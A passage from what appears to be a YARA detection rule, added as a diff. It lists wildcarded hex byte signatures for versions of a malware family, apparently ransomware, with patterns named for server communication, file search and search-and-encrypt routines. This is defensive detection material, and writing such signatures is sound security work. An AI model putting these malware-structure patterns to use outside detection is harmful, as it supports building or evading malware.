?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75 + F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 + C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15 + } + $server_communication_0_2_6a_2 = { + A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? + 53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ?? + ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? + ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6 + } + $server_communication_0_3_1_1 = { + 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? + ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? + ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? + 8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C + 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 + ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 + 85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50 + 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF + 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C + } + $server_communication_0_3_1_2 = { + 24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C + 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? + ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? + ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3 + } + $server_communication_0_3_3_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75 + F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0 + 83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 + EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? + ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51 + 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 + 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 + 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? + ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 + } + $server_communication_0_3_3_2 = { + 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 + ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52 + 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF + D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 + C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5 + } + $server_communication_0_3_4a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB + 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D + ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 + A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 + ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 + ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 + } + $server_communication_0_3_4a_2 = { + 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? + ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 + C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE + FD FF FF 8B 44 24 ?? 50 FF 15 + } + $server_communication_0_3_5a_1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 + 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50 + 68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? + 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 + C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? + ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? + 83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? + 8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 + } + $server_communication_0_3_5a_2 = { + 8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ?? + ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 + 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54 + 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15 + } + $server_communication_2_0_4e = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ?? + ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ?? + ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ?? + ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68 + ?? ?? ?? ?? FF 15 + } + $search_and_encrypt_2_0_4e_1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 + 57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? + ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84 + } + $search_and_encrypt_2_0_4e_2 = { + 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? + ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? + 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? + ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 + } + $search_and_encrypt_2_0_4e_3 = { + 8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76 + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D + ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? + ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 + } + $search_and_encrypt_2_0_4e_4 = { + 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? + 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 + 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 + C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 + } + $search_and_encrypt_2_0_4e_5 = { + 8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ?? + ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D + ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 + C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ?? + 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 + } + $server_communication_4_0_1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 + } + $server_communication_4_0_2 = { + 8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D + ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB + 75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C + ?? ?? ?? ?? 50 E8 + } + $server_communication_4_0_3 = { + 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2] + 8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ?? + 8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8 + ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ?? + ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? + ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50 + } + $file_search_4_0_1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68 + ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ?? + ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 6A ?? 51 E8 + } + $file_search_4_0_2 = { + 74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? + ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52 + 8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? + ?? ?? 50 8D 8D + } + $file_search_4_0_3 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? + ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 + CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $file_search_4_1b_1 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? 